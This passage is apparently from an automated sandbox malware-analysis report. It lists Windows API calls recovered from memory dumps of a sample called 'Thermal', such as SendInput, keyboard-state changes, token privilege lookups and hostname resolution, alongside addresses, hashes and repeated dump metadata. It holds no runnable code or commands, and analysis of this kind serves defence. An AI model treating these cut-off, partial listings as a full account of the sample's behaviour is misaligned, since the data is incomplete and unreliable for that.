                                                • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 007D1465
                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 007D1481
                                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 007D14E0
                                                • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 007D1532
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: KeyboardState$InputMessagePostSend
                                                • String ID:
                                                • API String ID: 432972143-0
                                                • Opcode ID: 9ecdf6a8b50825cea521af5f4d21a6ef945df20c76d4f3c7d975860c52d8215e
                                                • Instruction ID: da33f123ecaf165899e61500aa3b6a256b30bb0568d9b785c2acb072df800449
                                                • Opcode Fuzzy Hash: 9ecdf6a8b50825cea521af5f4d21a6ef945df20c76d4f3c7d975860c52d8215e
                                                • Instruction Fuzzy Hash: CA314E70E40298BEFF348A659C04BFABB75AB85310F88831BE491523D1C37C89559B61
                                                APIs
                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007A642B
                                                • __isleadbyte_l.LIBCMT ref: 007A6459
                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007A6487
                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007A64BD
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                • String ID:
                                                • API String ID: 3058430110-0
                                                • Opcode ID: b60eb5be80a68aef34f65a79439e51519f585cbae0277ecd2f37bbaa858d296a
                                                • Instruction ID: 044d6566a71a918a6c151f423f5991fd6683d9214c3d250bc0594115c8ed8736
                                                • Opcode Fuzzy Hash: b60eb5be80a68aef34f65a79439e51519f585cbae0277ecd2f37bbaa858d296a
                                                • Instruction Fuzzy Hash: CE31C631604296EFDF218F75CC44BAA7BA5FF86310F194229F86487191EB39DA50DB50
                                                APIs
                                                • GetForegroundWindow.USER32 ref: 007F553F
                                                  • Part of subcall function 007D3B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007D3B4E
                                                  • Part of subcall function 007D3B34: GetCurrentThreadId.KERNEL32 ref: 007D3B55
                                                  • Part of subcall function 007D3B34: AttachThreadInput.USER32(00000000,?,007D55C0), ref: 007D3B5C
                                                • GetCaretPos.USER32(?), ref: 007F5550
                                                • ClientToScreen.USER32(00000000,?), ref: 007F558B
                                                • GetForegroundWindow.USER32 ref: 007F5591
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                • String ID:
                                                • API String ID: 2759813231-0
                                                • Opcode ID: c82d5ae88c5dda3d022dbeaeb5f1e5b186814961e8170929d1ec823d45644b52
                                                • Instruction ID: dd4b96c257f30f34b82de776565b68ff22b73f6e47a235f301e0b34afcf04fd1
                                                • Opcode Fuzzy Hash: c82d5ae88c5dda3d022dbeaeb5f1e5b186814961e8170929d1ec823d45644b52
                                                • Instruction Fuzzy Hash: CD312F71A00108EFDB10EFA5C8859EEB7F9EF98304F10806AE515E7241DB79AE408FA0
                                                APIs
                                                  • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                • GetCursorPos.USER32(?), ref: 007FCB7A
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,007ABCEC,?,?,?,?,?), ref: 007FCB8F
                                                • GetCursorPos.USER32(?), ref: 007FCBDC
                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,007ABCEC,?,?,?), ref: 007FCC16
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                • String ID:
                                                • API String ID: 2864067406-0
                                                • Opcode ID: 985e969aced4556fe75a7973b4ff5d3c9915389d3fa59156fd84dda5895e0d31
                                                • Instruction ID: 9aa79783933daa5869f5a9c35b0c62a7444d75abd20426d463979777d98633c1
                                                • Opcode Fuzzy Hash: 985e969aced4556fe75a7973b4ff5d3c9915389d3fa59156fd84dda5895e0d31
                                                • Instruction Fuzzy Hash: 5131817950001CAFCB268F95CC59EBA7BB9FB89310F044099FA15A7361C7359D51EFA0
                                                APIs
                                                • __setmode.LIBCMT ref: 00790BE2
                                                  • Part of subcall function 0078402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007D7E51,?,?,00000000), ref: 00784041
                                                  • Part of subcall function 0078402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007D7E51,?,?,00000000,?,?), ref: 00784065
                                                • _fprintf.LIBCMT ref: 00790C19
                                                • OutputDebugStringW.KERNEL32(?), ref: 007C694C
                                                  • Part of subcall function 00794CCA: _flsall.LIBCMT ref: 00794CE3
                                                • __setmode.LIBCMT ref: 00790C4E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                • String ID:
                                                • API String ID: 521402451-0
                                                • Opcode ID: c589b273b9c3052813750701471f362e86da66377c0d809c8f264e3e77885202
                                                • Instruction ID: 6b6ab4fe93bf39f4572bf35453d3cd6aaa0a448404c919d2847dd6290d662ef4
                                                • Opcode Fuzzy Hash: c589b273b9c3052813750701471f362e86da66377c0d809c8f264e3e77885202
                                                • Instruction Fuzzy Hash: 75110272A04208EEDF18B7A4BC4AEBE7B69EF42320F14015AF204962C2DF6D584247A1
                                                APIs
                                                  • Part of subcall function 007C8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007C8D3F
                                                  • Part of subcall function 007C8D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D49
                                                  • Part of subcall function 007C8D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D58
                                                  • Part of subcall function 007C8D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D5F
                                                  • Part of subcall function 007C8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D75
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007C92C1
                                                • _memcmp.LIBCMT ref: 007C92E4
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007C931A
                                                • HeapFree.KERNEL32(00000000), ref: 007C9321
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                • String ID:
                                                • API String ID: 1592001646-0
                                                • Opcode ID: 4c4b19761cbaab3177ca7446debc76913dbbadb34b81dbedb4fe555e9f532254
                                                • Instruction ID: 274cde1c7bed595763e193792cdfd2fea6aed3a95a6a5a5813555f0cb74f50cf
                                                • Opcode Fuzzy Hash: 4c4b19761cbaab3177ca7446debc76913dbbadb34b81dbedb4fe555e9f532254
                                                • Instruction Fuzzy Hash: 43216632E40109EBDB50DFA4C949FEEB7B8FF44301F04405DE985AB291E778AA05CBA0
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EC), ref: 007F63BD
                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007F63D7
                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007F63E5
                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 007F63F3
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$Long$AttributesLayered
                                                • String ID:
                                                • API String ID: 2169480361-0
                                                • Opcode ID: 3bbb09ef52e176b61f88d49fa563ac92da64460b951ca663546e2bf0cb2d35a4
                                                • Instruction ID: fdba685d7920014f604a46390698655bde2b80c26739a912a229f79260ae837e
                                                • Opcode Fuzzy Hash: 3bbb09ef52e176b61f88d49fa563ac92da64460b951ca663546e2bf0cb2d35a4
                                                • Instruction Fuzzy Hash: 30119631305518AFDB14AB24DC49FBA77A9EF45320F148119F616D73D2CBA8AD01CB95
                                                APIs
                                                  • Part of subcall function 007CF858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,007CE46F,?,?,?,007CF262,00000000,000000EF,00000119,?,?), ref: 007CF867
                                                  • Part of subcall function 007CF858: lstrcpyW.KERNEL32(00000000,?,?,007CE46F,?,?,?,007CF262,00000000,000000EF,00000119,?,?,00000000), ref: 007CF88D
                                                  • Part of subcall function 007CF858: lstrcmpiW.KERNEL32(00000000,?,007CE46F,?,?,?,007CF262,00000000,000000EF,00000119,?,?), ref: 007CF8BE
                                                • lstrlenW.KERNEL32(?,00000002,?,?,?,?,007CF262,00000000,000000EF,00000119,?,?,00000000), ref: 007CE488
                                                • lstrcpyW.KERNEL32(00000000,?,?,007CF262,00000000,000000EF,00000119,?,?,00000000), ref: 007CE4AE
                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,007CF262,00000000,000000EF,00000119,?,?,00000000), ref: 007CE4E2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: lstrcmpilstrcpylstrlen
                                                • String ID: cdecl
                                                • API String ID: 4031866154-3896280584
                                                • Opcode ID: afbc68b6d5fdc365823930ff2341ac6e85007c85fa78a556c37cb46a2077db23
                                                • Instruction ID: e009f547a9cb4ac4d721647b8d310bc913ed4856b30d48297ff52b0aa3cf9c81
                                                • Opcode Fuzzy Hash: afbc68b6d5fdc365823930ff2341ac6e85007c85fa78a556c37cb46a2077db23
                                                • Instruction Fuzzy Hash: 7511603A200345EFDB25AF24EC49E7A77A9FF45350B80402EF806CB2A0FB759951CB91
                                                APIs
                                                • _free.LIBCMT ref: 007A5331
                                                  • Part of subcall function 0079593C: __FF_MSGBANNER.LIBCMT ref: 00795953
                                                  • Part of subcall function 0079593C: __NMSG_WRITE.LIBCMT ref: 0079595A
                                                  • Part of subcall function 0079593C: RtlAllocateHeap.NTDLL(00D70000,00000000,00000001,?,00000004,?,?,00791003,?), ref: 0079597F
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AllocateHeap_free
                                                • String ID:
                                                • API String ID: 614378929-0
                                                • Opcode ID: d25a5581d1df0c0bb80e0d9597316f7020961add16f9b4eb143daf31cad5aa56
                                                • Instruction ID: 66028b49f21bdc308f5a2d112033072a93df63beed57a2ca693edf2eaa8fae12
                                                • Opcode Fuzzy Hash: d25a5581d1df0c0bb80e0d9597316f7020961add16f9b4eb143daf31cad5aa56
                                                • Instruction Fuzzy Hash: 2F112732505E15EFCF253F70BC0975E3794AFD63A5F110B29F8189A190CEBC89408780
                                                APIs
                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 007D4385
                                                • _memset.LIBCMT ref: 007D43A6
                                                • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 007D43F8
                                                • CloseHandle.KERNEL32(00000000), ref: 007D4401
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CloseControlCreateDeviceFileHandle_memset
                                                • String ID:
                                                • API String ID: 1157408455-0
                                                • Opcode ID: 845ac93f1e58c02398532c22143ee836e3b90d9979c13038435103b4f8cc0865
                                                • Instruction ID: 78a9ad867a479d79b7651d7b76062bae33b236ed956efcf1b481e80555137e95
                                                • Opcode Fuzzy Hash: 845ac93f1e58c02398532c22143ee836e3b90d9979c13038435103b4f8cc0865
                                                • Instruction Fuzzy Hash: 09118A75901228BBD7309BA5AC4DFEBBB7CEF45760F10459AF908E7290D6744E808BA4
                                                APIs
                                                  • Part of subcall function 0078402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007D7E51,?,?,00000000), ref: 00784041
                                                  • Part of subcall function 0078402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007D7E51,?,?,00000000,?,?), ref: 00784065
                                                • gethostbyname.WSOCK32(?,?,?), ref: 007E6A84
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E6A8F
                                                • _memmove.LIBCMT ref: 007E6ABC
                                                • inet_ntoa.WSOCK32(?), ref: 007E6AC7
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                • String ID:
                                                • API String ID: 1504782959-0
                                                • Opcode ID: 63a4637ce5599e960369ef7ade03f1a8fe9b954c1eccab23ec7112256d886d1d
                                                • Instruction ID: b8a6821a75b888c67683dafd5ea247bbc55e0dc7ef4b619fe0e25fdd9b985fb1
                                                • Opcode Fuzzy Hash: 63a4637ce5599e960369ef7ade03f1a8fe9b954c1eccab23ec7112256d886d1d
                                                • Instruction Fuzzy Hash: FA114F71900109EFCB44FBA4DD4ADAEB7B8FF18311B148065F506A72A2DF359E14DBA1
                                                APIs
                                                  • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                • DefDlgProcW.USER32(?,00000020,?), ref: 007716B4
                                                • GetClientRect.USER32(?,?), ref: 007AB93C
                                                • GetCursorPos.USER32(?), ref: 007AB946
                                                • ScreenToClient.USER32(?,?), ref: 007AB951
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                • String ID:
                                                • API String ID: 4127811313-0
                                                • Opcode ID: 90d3799d678e3475d3ed9ffb56a9ed1999f9703d1655dcc08bfebad201ca9dc0
                                                • Instruction ID: c4369f5d0765001c434cdf425d879a5338e63f09b2c927c253f8518ed20ba38e
                                                • Opcode Fuzzy Hash: 90d3799d678e3475d3ed9ffb56a9ed1999f9703d1655dcc08bfebad201ca9dc0
                                                • Instruction Fuzzy Hash: 4F114375A00119EBCF10EF98C8899BE77B9FB45300F944499EA15E7141CB38BA51CFA1
                                                APIs
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 007C9719
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007C972B
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007C9741
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007C975C
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 22fb4cabcbb5f56c7165b909ebc0bdc712953979a0de1e781ef0986d5506c257
                                                • Instruction ID: 243b742e4ce3c581b3cdbbea371c8b0d9b973090743d7f4a7bb28fa9a1be9226
                                                • Opcode Fuzzy Hash: 22fb4cabcbb5f56c7165b909ebc0bdc712953979a0de1e781ef0986d5506c257
                                                • Instruction Fuzzy Hash: 11115A39901218FFEB11DF95CD84F9DBBB8FB48710F204099EA00B7290D671AE10DB90
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077214F
                                                • GetStockObject.GDI32(00000011), ref: 00772163
                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 0077216D
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CreateMessageObjectSendStockWindow
                                                • String ID:
                                                • API String ID: 3970641297-0
                                                • Opcode ID: 25fc8f3e301fb77e98e8cfc02b08790b66ca760de760a536a462bb7393badd18
                                                • Instruction ID: 37a2a20bb87e05dc9f06de63df1656a23cb671be1d0da349fd25e46669544f83
                                                • Opcode Fuzzy Hash: 25fc8f3e301fb77e98e8cfc02b08790b66ca760de760a536a462bb7393badd18
                                                • Instruction Fuzzy Hash: 8F118B7210120DBFDF125F909C44EEA7BA9FF583A4F444211FA2852111C73ADC61EFA0
                                                APIs
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007D04EC,?,007D153F,?,00008000), ref: 007D195E
                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,007D04EC,?,007D153F,?,00008000), ref: 007D1983
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007D04EC,?,007D153F,?,00008000), ref: 007D198D
                                                • Sleep.KERNEL32(?,?,?,?,?,?,?,007D04EC,?,007D153F,?,00008000), ref: 007D19C0
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CounterPerformanceQuerySleep
                                                • String ID:
                                                • API String ID: 2875609808-0
                                                • Opcode ID: 908e42b33cc98ba3da059d2cf200e3efe96ec51bcb59b739299c0d0ba918ee37
                                                • Instruction ID: a91abccd71289c919daaa5b77651d248edbb0f697840db07ecded2916e6075ce
                                                • Opcode Fuzzy Hash: 908e42b33cc98ba3da059d2cf200e3efe96ec51bcb59b739299c0d0ba918ee37
                                                • Instruction Fuzzy Hash: 40112731D0466DEBCF00DFA5D9A8BEEBB78FF08751F804156E981B2245CB34A660CB91
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 007FE1EA
                                                • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 007FE201
                                                • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 007FE216
                                                • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 007FE234
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
